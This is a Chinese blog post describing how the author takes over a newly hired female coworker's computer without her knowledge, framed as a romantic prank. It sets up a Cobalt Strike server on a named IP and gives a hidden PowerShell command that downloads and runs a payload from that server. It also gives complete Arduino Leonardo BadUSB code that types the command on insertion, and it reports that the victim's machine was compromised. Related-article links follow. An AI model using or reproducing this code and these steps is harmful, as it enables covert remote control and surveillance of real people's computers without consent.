渗透小姐姐的心系列-控制小姐姐电脑(1)

简介: 渗透小姐姐的心系列-控制小姐姐电脑(1)

背景

 

公司前几天刚入职了一个小姐姐,看到她的第一眼,我发现我恋爱了。

所以我一定要拿到她的电脑权限!!!!



 

Badusb:伪造计算机交互设备

 

 

1.部署cs

服务器:

通过screen启动cs服务端

screnn -dmS xiaojiejie
screnn -r xiaojiejie
./teamserver 111.229.77.212 520520

 

 


 

客户端启动

 


java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

 

客户端连接

 

c9ce9e9d76cf77b1f73304003d62f2e2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


配置监听器:

 


 

生成后门下载链接

 


 

 

 

复制出


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"

 

安装Arduino IDE(回复公众号(渗透小姐姐的心)查看下载链接。)

 


设置开发版和编程器

 

 

编写代码

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://111.229.77.212:80/xiaojiejie'))"");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();
}
void loop()
{
}

 


指令过长

重新生成payload

 


保存到桌面

上传到服务器

使用python实现下载服务


python -m SimpleHTTPServer 8080

 


 

写入代码

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd.exe /c powershell.exe IEX(New-ObjectNet.WebClient).DownloadString('http://111.229.77.212:8080/xiaojiejie.ps1')");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.end();
}
void loop()
{
}

验证

 


 

取得开发版信息

 

硬件插入电脑

打开Arduino IDE

工具->->选择Arduino Leonardo

工具->Port->选择COM* (Arduino Leonardo)

现在可以看到IDE右下角出现Arduino Leonardo on COM*

 

4924f4c4f3be54ba30d6ab5365a73f3c_640_wx_fmt=gif&wxfrom=5&wx_lazy=1.gif

上传



 

插上小姐姐的电脑,成功上线!

 

 


相关文章
|
4月前
|
存储 监控 网络协议
远程控制与操作:局域网企业监控软件的远程管理代码
随着科技的飞速发展,企业管理也变得更加智能和便捷。在局域网内,局域网企业监控软件的远程管理代码扮演着重要的角色,使管理员能够实时远程控制和操作监控系统。本文将深入探讨这些代码的实现原理,并通过多个例子展示其功能和效果。
200 0
|
5月前
|
数据采集 监控 物联网
物联网时代的电脑行为监控软件:代码实现与设备连接
随着物联网技术的飞速发展,电脑行为监控软件在日常生活和商业领域中变得愈发重要。这种软件通过对电脑用户行为的监测,提供了有益的数据,有助于改善用户体验、增强安全性,甚至在一些场景中实现自动化操作。本文将探讨物联网时代的电脑行为监控软件的代码实现与设备连接,并重点介绍监控到的数据如何自动提交到网站。
275 0
|
8月前
|
安全 Java 网络虚拟化
家里的 Mac 电脑远程控制公司的 Win10 电脑,疫情也不影响办公!!!
家里的 Mac 电脑远程控制公司的 Win10 电脑,疫情也不影响办公!!!
101 0
|
Android开发
电脑控制安卓手机:scrcpy
电脑控制安卓手机:scrcpy
153 0
电脑控制安卓手机:scrcpy
|
监控 安全 网络协议
近20万WiFi监控摄像头存在远程代码执行漏洞,可随意组建僵尸网络
本文讲的是近20万WiFi监控摄像头存在远程代码执行漏洞,可随意组建僵尸网络,Pierre Kim通过Full Disclosure发布的安全公告披露,影响18.5万Wi-Fi监控摄像头的安全漏洞暴露在网上,随时会被黑客和诈骗者利用。
2650 0
|
安全 数据安全/隐私保护
趋势科技警告:CAN标准存在漏洞,联网汽车可被远程操控
本文讲的是趋势科技警告:CAN标准存在漏洞,联网汽车可被远程操控,事实上,最近几年研究人员和工程师已经找到了很多种入侵现代互联网汽车的方法,并且被记录和报告过多次。查理·米勒和克里斯·瓦拉斯克(Chris Valasek)就曾发现过一个杰出的案例。
1513 0